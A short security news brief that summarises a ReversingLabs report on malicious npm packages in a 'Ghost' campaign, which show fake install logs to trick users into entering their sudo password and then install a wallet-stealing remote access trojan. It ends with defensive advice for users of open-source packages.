Illicit npm packages leverage bogus install logs for covert malware infections

Infosecurity Magazine reports that multiple malicious npm packages with downloader capability have shown bogus installation logs to stealthily inject cryptocurrency wallet and sensitive information-stealing malware as part of the new Ghost campaign that commenced in early February. Installation of the illicit packages prompts the display of fake logs, including dependency download messages, progress bars, and random delays, which aim to lure targets into providing their sudo password that would then be used to execute a remote access trojan as final-stage malware, according to ReversingLabs researchers. Aside from pilfering crypto wallets, other versions of the RAT were also imbued with more comprehensive data exfiltration functionality. With several other packages having similar code hinting at a potentially larger attack operation, users of open-source packages have been urged to not only verify package authors and repository history and track installation scripts and atypical prompts, but also leverage automated security scanners and shun sudo password inputs during the installation process.